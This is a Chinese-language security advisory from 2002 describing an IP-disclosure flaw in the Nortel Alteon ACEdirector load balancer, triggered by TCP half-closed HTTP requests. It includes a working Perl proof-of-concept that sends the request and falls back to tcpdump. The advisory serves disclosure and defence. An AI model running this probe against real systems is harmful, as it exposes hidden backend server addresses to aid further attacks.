Alteon AceDirector 半关闭HTTP请求可导致IP地址泄露漏洞发布时间:2002-01-28 更新时间:2002-01-28 严重程度:中 威胁程度:服务器信息泄露 错误类型:设计错误 利用方式:服务器模式 BUGTRAQ ID:3964 受影响系统 Nortel Networks WebOS 9.0详细描述 Alteon ACEdirector 是一宽硬件解决方案,运行Nortel WebOS 操作系统。 当客户端通过Alteon ACEdirector 的虚拟IP地址连接WEB服务程序的时候, 连接到WEB服务程序中的可负载均衡池会被COOKIE和会话ID跟踪。 当客户段半关闭连接的时候,负载均衡器不再改动ACEdirector的真实IP而直接 发送给客户端,导致真实IP被泄露。 测试代码 #! /usr/local/bin/perl # acedirector_request - trivial script to do an HTTP Simple-Request of "/" # utilizing TCP half-close. # # This script was written to demonstrate how one can # elicit erroneous behavior from an Alteon/Nortel # ACEdirector which has been configured to use its # "Server Load Balancing" (SLB) and "Cookie-Based # Persistence" features. # # Dave Plonka <plonka@doit.wisc.edu>, Dec 20 2001 use IO::Socket; use FindBin; use Getopt::Std; if (!getopts('c:') or '' eq $ARGV[0]) { die "usage: $FindBin::Script [-c COOKIE] web_server\n" } my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0], PeerPort => 'http(80)', Proto => 'tcp'); die unless ref($sock); if (!$opt_c) { print $sock "GET /\r\n"; } else { print $sock "GET / HTTP/1.0\r\nCookie: ${opt_c}=X\r\n\r\n"; } $sock->shutdown(1); @response = <$sock>; if (@response) { print join("\n", @response) } else { if ($opt_c) { my $command = "tcpdump -nv tcp and port 80 and not host $ARGV[0]"; warn "$ARGV[0] did not respond to TCP half-closed request.\n" . " Launching tcpdump to watch for RST...\n"; system($command . " 2>&1"); if (0 != ($?/256)) { warn "\"$command\" failed.\n" } } else { warn "$ARGV[0] did not response to TCP half-closed request.\n" . "It might be an ACEdirector.\n" } } exit 解决方案 尚无 相关信息 Dave Plonka <dplonka@mil.doit.wisc.edu> 相关主页:http://www.securityfocus.com/archive/1/252455 |
